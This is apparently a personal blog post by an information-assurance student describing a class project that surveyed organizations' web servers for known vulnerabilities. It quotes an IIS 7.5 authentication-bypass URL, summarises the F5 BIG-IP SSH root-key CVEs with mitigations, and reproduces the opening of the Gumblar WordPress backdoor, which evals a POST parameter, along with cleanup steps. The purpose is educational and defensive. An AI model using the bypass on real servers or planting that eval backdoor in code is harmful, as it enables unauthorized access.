Hi.

Welcome.

I have documented all my discussions, projects and different trends from obtaining my Master's in Information Assurance and my Doctorate in Information Technology.

 The key is - Educate

It is crucial that people are educated about security; how to deter from intrusion at ones organization; and most importantly protecting one self.

Building systems and educating on information assurance have been my exposure more than half of my life.

This is my journey of accomplishments, even more Struggles and a few solutions.

I hope you Enjoy!
vulnerable?

vulnerable?

This project called for reviewing a few different organizations and ones “framework” ie their operating system and the web servers that are used at each company.  There are many tools for accessing this information.  Overall, the basis were to find and study the details by providing the vulnerabilities and possible solutions if applicable.  The operating systems and web servers are very common servers used by many companies today.

The exercise it to teach one how to protect the business.  Realizing there are these tools are available -  it is best to stay “ahead” of the game.  The tool only required to plug in the website for any organization.  I was able to retrieve the following details on all companies (no data is being provided).

The information found on the organizations are listed below.

Here are the results.


Microsoft IIS/7.5 (Web Server):

Microsoft IIS/7.5 as it listed “Multiple vulnerabilities”. “It affects the IIS 7.5 and .net framework 4.0. By appending ":$i30:$INDEX_ALLOCATION" to the directory serving the -- file access restrictions can be successfully bypassed (Microsoft, N.d.)”.   The PHP script without asking for proper credentials. Classic ASP file access restrictions can be successfully bypassed.

Another exploit is by adding “http://<victimIIS75>/admin:$i30:$INDEX_ALLOCATION/admin.php will run the PHP script without asking for proper credentials (Microsoft, N.d.)”. 

These were both successful and tested on Window 7.


F5 BIG-IP (OS):

Another for the F5 was that “SSH Private Key which affected many system and one being the BIG-IP (Constantin, 2012)”.   What this does is it attaches to the root “which allows unauthorized users to bypass authentication and login as root (Constantin, 2012)”.   It is “identified as CVE-2012-1493 and can result in a full system compromise (Constantin, 2012)”.  

The “CVE-2012-1492 vulnerability has been discovered that may allow a remote user to gain privileged access to affected systems using SSH. The vulnerability is caused by a configuration error, and is not the result of an underlying SSH defect (SOL3600, N.d.)”. 

“Recommended action:

A number of options exist to address this vulnerability. Perform one or more of the following procedures, as appropriate, for your situation:

  • Upgrading to a non-vulnerable version
  • Reconfiguring SSH access
  • Mitigating the risk of exploitation
  • Recovering a compromised system (SOL3600, N.d)”

 Wordpress (Web Server):

There is or was a “PHP script injection” that attaches itself known as “gumblar.cn/rss/?*” (Kristi, 2009). 

“The code was in the beginning of these php files, and started out as follows: <?php if(!function_exists(‘tmp_lkojfghx’)){if(isset($_POST{tmp_lkojghx3’]))eval($_POST[‘tmp_lkojfghx3’]);if(!defined(TMP_XHGFJOKL’))….(Kristi, 2009)”.

It was stated that even after “removing the code” it was still showing up in many areas as the final step was to remove the plug-in folders and that removed it (Kristi, 2009).

“In summary, these were the steps I took to remove the code from my site, which took about two hours:

  • Saving the original wp-config.php and custom-functions.php from Thesis after the removal of the script in the top line of the PHP
  •  Downloading and installing a fresh copy of WordPress 2.7.1 and my current theme, Thesis 1.5
  • Deleting all plug-ins and re-installing them from inside the WordPress admin panel
  • Changing my WordPress and FTP login passwords to (hopefully) protect my site from further attacks (Kristi, 2009)”
top security tools

top security tools

mandiant report

mandiant report